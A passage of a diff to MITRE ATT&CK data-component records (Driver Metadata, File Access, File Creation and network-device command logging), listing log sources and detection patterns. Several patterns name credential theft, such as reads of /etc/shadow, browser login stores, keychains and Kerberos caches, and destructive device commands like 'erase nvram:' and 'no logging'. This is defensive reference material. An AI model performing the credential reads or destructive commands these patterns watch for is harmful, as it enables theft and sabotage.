+                            "name": "networkdevice:cli",
+                            "channel": "Execution of CLI commands altering crypto parameters (e.g., 'crypto key generate rsa modulus 512')"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "format flash:, format disk, reformat commands"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "erase flash:, erase nvram:, format disk"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "command logs"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "command logging"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "Interface commands"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "Execution of privileged commands such as 'copy tftp flash', 'boot system', or 'debug memory'"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "Execution of commands disabling crypto hardware acceleration (e.g., 'no crypto engine enable')"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "shell command"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "Commands like 'no logging' or equivalents that disable session history"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "Execution of commands such as 'copy tftp flash', 'boot system <image>', 'reload'"
+                        },
+                        {
+                            "name": "networkdevice:config",
+                            "channel": "PKI export or certificate manipulation commands"
+                        },
+                        {
+                            "name": "networkdevice:config",
+                            "channel": "Configuration changes referencing 'boot system tftp' or modification of startup-config pointing to external TFTP servers"
+                        },
+                        {
+                            "name": "networkdevice:Firewall",
+                            "channel": "Audit trail or CLI/API access indicating commands like no access-list, delete rule-set, clear config"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Command Audit / Configuration Change"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "eventlog"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "command_exec"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "command-exec: CLI commands containing \"show clock\", \"show clock detail\", \"show timezone\" executed by suspicious user/source"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "cmd='show aaa*' OR 'show running-config | include password|aaa' OR 'show aaa common-criteria policy all'"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "CLI command audit"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "system boot logs"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "exec command='monitor capture'"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "no logging buffered, no aaa new-model, disable firewall"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "interactive shell logging"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "command sequence: erase \u2192 format \u2192 reload"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "CLI Command Logging"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "CLI Command Audit"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "command audit"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Privilege-level command execution"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Detected CLI command to export key material"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "reload command issued"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "syslog facility LOCAL7 or trap messages"
+                        },
+                        {
+                            "name": "saas:PRMetadata",
+                            "channel": "Commit message or branch name contains encoded strings or payload indicators"
+                        },
+                        {
+                            "name": "vpxd.log",
+                            "channel": "VM inventory queries and configuration enumeration through vCenter API calls"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Office-Alerts",
+                            "channel": "Unexpected DLL or component loaded at Office startup"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Office-Alerts",
+                            "channel": "Office application warning or alert on macro execution from template"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Office/OutlookAddinMonitor",
+                            "channel": "Outlook loading add-in via unexpected load path or non-default profile context"
+                        },
+                        {
+                            "name": "WinEventLog:PowerShell",
+                            "channel": "Get-ADTrust|GetAllTrustRelationships"
+                        },
+                        {
+                            "name": "WinEventLog:PowerShell",
+                            "channel": "EventCode=4103, 4104, 4105, 4106"
+                        },
+                        {
+                            "name": "WinEventLog:PowerShell",
+                            "channel": "Execution of Microsoft script to enumerate custom forms in Outlook mailbox"
+                        },
+                        {
+                            "name": "WinEventLog:PowerShell",
+                            "channel": "CommandLine=copy-item or robocopy from UNC path"
+                        },
+                        {
+                            "name": "WinEventLog:PowerShell",
+                            "channel": "PowerShell launched from outlook.exe or triggered without user invocation"
+                        },
+                        {
+                            "name": "WinEventLog:PowerShell",
+                            "channel": "Execution of PowerShell script to enumerate or remove malicious Home Page folder config"
+                        },
+                        {
+                            "name": "WinEventLog:PowerShell",
+                            "channel": "Exchange Cmdlets"
+                        },
+                        {
+                            "name": "WinEventLog:PowerShell",
+                            "channel": "CmdletName: Get-Recipient, Get-User"
+                        },
+                        {
+                            "name": "WinEventLog:PowerShell",
+                            "channel": "Execution of 'Get-WmiObject Win32_Product' or similar PowerShell cmdlets"
+                        },
+                        {
+                            "name": "WinEventLog:PowerShell",
+                            "channel": "Execution of PowerShell without -NoProfile flag"
+                        },
+                        {
+                            "name": "WinEventLog:PowerShell",
+                            "channel": "EventCode=4101"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4103, 4104, 4105, 4106"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.1",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "mobile-attack",
+                        "enterprise-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.774000+00:00\", \"old_value\": \"2026-04-24 19:47:16.123000+00:00\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--f5a9a1dd-82f9-41a3-85b8-13e5b9cd6c79",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.274000+00:00",
+                    "modified": "2026-05-12 15:12:00.779000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0074",
+                            "external_id": "DC0074"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Driver Metadata",
+                    "description": "to contextual data about a driver, including its attributes, functionality, and activity. This can involve details such as the driver's origin, integrity, cryptographic signature, issues reported during its use, and runtime behavior. Examples include metadata captured during driver integrity checks, hash validation, or error reporting. Examples: \n\n- Driver Signature Validation: A driver is validated to ensure it is signed by a trusted Certificate Authority (CA).\n- Driver Hash Verification: The hash of a driver is compared to a known good hash stored in a database.\n- Driver Compatibility Issues: A driver error is logged due to compatibility issues with a particular version of the operating system.\n- Vulnerable Driver Identification: Metadata indicates the driver version is outdated or contains a known vulnerability.\n- Monitoring Driver Integrity: Drivers are monitored for any unauthorized modifications to their binary or associated files.\n\nThis data component can be collected through the following measures:\n\nWindows\n\n- Windows Event Logs:\n    - Event ID 3000-3006: Logs metadata about driver signature validation.\n    - Event ID 2000-2011 (Windows Defender Application Control): Tracks driver integrity and policy enforcement.\n- Sysmon Logs: Configure Sysmon to capture driver loading metadata (Event ID 6).\n- Driver Verifier: Use Driver Verifier to collect diagnostic and performance data about drivers, including stability and compatibility metrics.\n- PowerShell: Use commands to retrieve metadata about installed drivers:\n`Get-WindowsDriver -Online | Select-Object Driver, ProviderName, Version`\n\nLinux\n\n- Auditd: Configure audit rules to monitor driver interactions and collect metadata: `auditctl -w /lib/modules/ -p rwxa -k driver_metadata`\n- dmesg: Use `dmesg` to extract kernel logs with driver metadata: `dmesg | grep \"module\"`\n- lsmod and modinfo: Commands to list loaded modules and retrieve metadata about drivers: `lsmod` | `modinfo <module_name>`\n\nmacOS\n\n- Unified Logs: Collect metadata from system logs about kernel extensions (kexts): `log show --predicate 'eventMessage contains \"kext load\"' --info`\n- kextstat: Command to retrieve information about loaded kernel extensions: `kextstat`\n\nSIEM Tools\n\n- Ingest Driver Metadata: Collect driver metadata logs from Sysmon, Auditd, or macOS logs into SIEMs like Splunk or Elastic.\n\nVulnerability Management Tools\n\n- Use these tools to collect metadata about vulnerable drivers across enterprise systems.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Extension disabled, unloaded, failed to start"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.1",
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.779000+00:00\", \"old_value\": \"2026-04-16 17:02:15.878000+00:00\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.273000+00:00",
+                    "modified": "2026-05-12 15:12:00.770000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0055",
+                            "external_id": "DC0055"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "File Access",
+                    "description": "To events where a file is opened or accessed, making its contents available to the requester. This includes reading, executing, or interacting with files by authorized or unauthorized entities. Examples include logging file access events (e.g., Windows Event ID 4663), monitoring file reads, and detecting unusual file access patterns. Examples: \n\n- File Read Operations: A user opens a sensitive document (e.g., financial_report.xlsx) on a shared drive.\n- File Execution: A script or executable file is accessed and executed (e.g., malware.exe is run from a temporary directory).\n- Unauthorized File Access: An unauthorized user attempts to access a protected configuration file (e.g., `/etc/passwd` on Linux or `System32` files on Windows).\n- File Access Patterns: Bulk access to multiple files in a short time (e.g., mass access to documents on a file server).\n- File Access via Network: Files on a network share are accessed remotely (e.g., logs of SMB file access).",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "macOS:unifiedlog",
+                            "channel": "looking for file access to scripts with abnormal encoding patterns"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "READ or COPY operations where path matches external/shared locations of other apps (e.g., /storage/emulated/0/Android/data/<otherpkg>/files/, /storage/emulated/0/Download/<app>/*)"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "KeyChain/AndroidKeyStore read of token alias"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "READ/LIST/STAT of /sdcard|/storage/emulated/0|/Android/media|/Documents with >N distinct paths in TimeWindow"
+                        },
+                        {
+                            "name": "auditd:FILE",
+                            "channel": "/home/*/.mozilla/firefox/*/logins.json OR /home/*/.config/google-chrome/*/Login Data"
+                        },
+                        {
+                            "name": "auditd:FILE",
+                            "channel": "/proc/*/mem read attempt"
+                        },
+                        {
+                            "name": "auditd:FS",
+                            "channel": "read: File access to /proc/modules or /sys/module/"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "Read access to known backup software configuration files (e.g., /etc/rsnapshot.conf, /opt/veeam/config.ini)"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "open: Access to sensitive log files (/var/log/auth.log, /var/log/secure, /var/log/syslog)"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "PATH"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "file read"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open, read, or stat of browser config files"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open: File access attempt on /tmp/krb5cc_* or /tmp/krb5.ccache"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "openat"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open, read"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open, flock, fcntl, unlink"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "read/open of sensitive files"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Unusual processes accessing or modifying cookie databases"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "PATH records referencing /dev/video*"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open, read: /etc/ssl/, /etc/pki/, ~/.pki/nssdb/"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Processes reading credential or token cache files"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "read/open of sensitive file directories"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/read of sensitive config or secret files"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/read of sensitive directories"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/read: Access to /proc/self/status with focus on TracerPID field"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/read access to ~/.bash_history"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open,read"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/read system calls to ~/.bash_history or /etc/shadow"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "read of /run/secrets or docker volumes by non-entrypoint process"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Reads of ~/.bash_history, ~/.mozilla, or access to /dev/input"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/read"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open: Access to named pipes or FIFO in /tmp or /dev/shm by unexpected processes"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open or read to browser cookie storage"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open, read, mount"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "file"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Access to /var/lib/sss/secrets/secrets.ldb or .secrets.mkey"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/read of sensitive directories (/etc, /home/*)"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "PATH"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/read on ~/.local/share/keepassxc/* OR ~/.password-store/*"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "attempts to read /proc/* entries at scale (openat/getdents64/readlink) or access denied for /proc traversal; correlate to app UID"
+                        },
+                        {
+                            "name": "azure:activity",
+                            "channel": "CollectGuestLogs: Unexpected collection of guest logs by Azure VM Agent outside normal maintenance windows"
+                        },
+                        {
+                            "name": "CloudTrail:GetObject",
+                            "channel": "sensitive credential files in buckets or local image storage"
+                        },
+                        {
+                            "name": "desktop:file_manager",
+                            "channel": "nautilus, dolphin, or gvfs logs"
+                        },
+                        {
+                            "name": "ebpf:syscalls",
+                            "channel": "container_file_activity"
+                        },
+                        {
+                            "name": "ebpf:syscalls",
+                            "channel": "open/read on secret mount paths"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "datastore file access"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "read: Access to sensitive log files by non-admin users"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "datastore/log file access"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "vSphere File API Access"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "file copy or datastore upload via HTTPS"
+                        },
+                        {
+                            "name": "esxi:syslog",
+                            "channel": "guest OS outbound transfer logs"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "VMFS access logs"
+                        },
+                        {
+                            "name": "esxis:vmkernel",
+                            "channel": "Datastore Access"
+                        },
+                        {
+                            "name": "File",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "fs:fileevents",
+                            "channel": "File system access events with kFSEventStreamEventFlagItemRemoved, kFSEventStreamEventFlagItemRenamed flags for environmental artifact collection (/System/Library, /usr/sbin, plist files)"
+                        },
+                        {
+                            "name": "fs:fsevents",
+                            "channel": "file system events indicating access to system configuration files and environmental information sources"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "file"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "File Access Monitor"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "Disk Activity Tracing"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "filesystem activity"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "Filesystem Call Monitoring"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "read/write"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "file open for known browser cookie paths"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "file reads/writes from /Volumes/"
+                        },
+                        {
+                            "name": "fs:quarantine",
+                            "channel": "/var/log/quarantine.log"
+                        },
+                        {
+                            "name": "gcp:audit",
+                            "channel": "Write operations to storage"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "READ operations from App Group containers (/var/mobile/Containers/Shared/AppGroup/...) or Files/Photos provider mountpoints, especially when group not owned by bundle"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "readdir/stat/read of /private/var/mobile/Containers/Shared/AppGroup|/Library/Mobile Documents|/On\\\\ My\\\\ iPhone with >N distinct paths in TimeWindow"
+                        },
+                        {
+                            "name": "kubernetes:audit",
+                            "channel": "GET or LIST requests to /var/run/secrets/kubernetes.io/serviceaccount/ followed by access to the Kubernetes API server"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "/proc/*/maps access"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "auth.log or custom tool logs"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "/var/log/syslog"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "kernel messages related to cryptographic operations, module loading, and filesystem access patterns"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "FileAccessed, MailboxAccessed"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Bulk downloads or API extractions from Microsoft-hosted data repositories (e.g., Dynamics 365)"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "ES_EVENT_TYPE_NOTIFY_OPEN: Open of .dylib/.so in user-writable locations"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "open: Process opens AppleCamera/IOUSB device nodes or AVFoundation frameworks"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "open or read syscall to ~/.bash_history"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "es_event_open, es_event_exec"
+                        },
+                        {
+                            "name": "macos:keychain",
+                            "channel": "Access to Keychain DB or system.keychain"
+                        },
+                        {
+                            "name": "macos:keychain",
+                            "channel": "~/Library/Keychains, /Library/Keychains"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "file_events"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Access to ~/Library/*/Safari or Chrome directories by non-browser processes"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "file events"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Kerberos framework calls to API:{uuid} cache outside normal process lineage"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "~/Library/Application Support/Google/Chrome/*/Login Data OR ~/Library/Application Support/Firefox/*/logins.json"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Read access to Time Machine plist files or CCC configurations in ~/Library/Preferences/"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream - file subsystem"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "file read of sensitive directories"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Abnormal process access to Safari or Chrome cookie storage"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "open: Access to /var/log/system.log or related security event logs"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "open/read of *.plist or .env files"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "read of user document directories"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "read access to ~/Library/Keychains/login.keychain-db"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "filesystem and process events"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "read access to ~/Library/Keychains or history files by terminal processes"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "access to /Volumes/SharePoint or network mount"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Access to ~/Library/Safari/Bookmarks.plist or recent files"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "access to keychain database"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream - file provider subsystem"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "read/write of user documents prior to upload"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "open/read access to private key files (id_rsa, *.pem, *.p12)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "read: File access to /System/Library/Extensions/ or related kernel extension paths"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "*.opvault OR *.ldb OR *.kdbx"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Recent download opened or executed"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application reads multiple local container files, browser-history artifacts, messaging artifacts, or local records in rapid sequence during the collection phase"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application performs burst reads across local system paths, external storage, media directories, cache locations, or local database files within a short interval as the primary collection phase"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application loads executable or library from external or writable directory (e.g., /sdcard/, app cache) prior to execution"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-Windows Defender/Operational",
+                            "channel": "Suspicious file execution on removable media path"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4663, 4670, 4656"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "3.0",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "enterprise-attack",
+                        "mobile-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.770000+00:00\", \"old_value\": \"2026-04-23 18:39:07.536000+00:00\"}}}",
+                    "previous_version": "3.0"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.273000+00:00",
+                    "modified": "2026-05-12 15:12:00.770000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0039",
+                            "external_id": "DC0039"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "File Creation",
+                    "description": "A new file is created on a system or network storage. This action often signifies an operation such as saving a document, writing data, or deploying a file. Logging these events helps identify legitimate or potentially malicious file creation activities. Examples include logging file creation events (e.g., Sysmon Event ID 11 or Linux auditd logs). ",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "File",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "EventCode=11"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "creat"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "file write"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "CREATE/MODIFY: Modification of app.asar inside .app bundle"
+                        },
+                        {
+                            "name": "auditd:FILE",
+                            "channel": "File creation with name starting with '.'"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Creation or modification of browser extension .plist files"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open or creat syscalls targeting excluded paths"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "file creation in AV exclusion directories"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "file creation/modification"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "file write/create"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "file write"
+                        },
+                        {
+                            "name": "snmp:syslog",
+                            "channel": "firmware write/log event"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open,creat,rename: Writes in $HOME/Downloads, /tmp, ~/.cache with exe/script/archive/office extensions"
+                        },
+                        {
+                            "name": "fs:fsevents",
+                            "channel": "Create in /Users/*/Downloads or /private/var/folders/* with quarantine attribute"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "file events"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "VMFS file creation"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "write/open, FIM audit"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "open/write/exec calls"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Creation of .plist under /Library/Managed Preferences/"
+                        },
+                        {
+                            "name": "fs:fileevents",
+                            "channel": "creat"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "disk activity on /Library/LaunchAgents or LaunchDaemons"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "file_events"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open: Write to ~/.vscode-cli/code_tunnel.json"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "creation of ~/.vscode-cli/code_tunnel.json"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "create/modify dylib files in monitored directories"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "write"
+                        },
+                        {
+                            "name": "linux:Sysmon",
+                            "channel": "New files in /tmp, /var/tmp, $HOME/.cache, executed within TimeWindow after browser HTTP fetch"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "New files written to /var/folders, /tmp, ~/Library/Caches, or ~/Downloads by browser context or its children"
+                        },
+                        {
+                            "name": "auditd:FILE",
+                            "channel": "create: New file created in system binaries or temp directories"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "File created in ~/Library/LaunchAgents or executable directories"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open, unlink, rename: File creation or deletion involving critical stored data"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process wrote large .mov/.mp4 in user temp/hidden dirs"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "logd:file write"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "File IO"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "creat, open, write on /etc/systemd/system and /usr/lib/systemd/system"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "File creation"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Attachment files written to ~/Downloads or temporary folders"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "file activity"
+                        },
+                        {
+                            "name": "CloudTrail:PutObject",
+                            "channel": "PutObject"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "Creation of files with extensions .sql, .csv, .sqlite, especially in user directories"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Writes of .sql/.csv/.xlsx files to user documents/downloads"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "New .py/.js/.sh files written to ~/.local/, ~/.cache/, or /tmp/ within 5 min of package install"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "write, open, or rename to /etc/systemd/system/*.service"
+                        },
+                        {
+                            "name": "auditd:FILE",
+                            "channel": "create: Creation of .zip, .gz, .bz2 files in /tmp, /var/tmp, or /home directories"
+                        },
+                        {
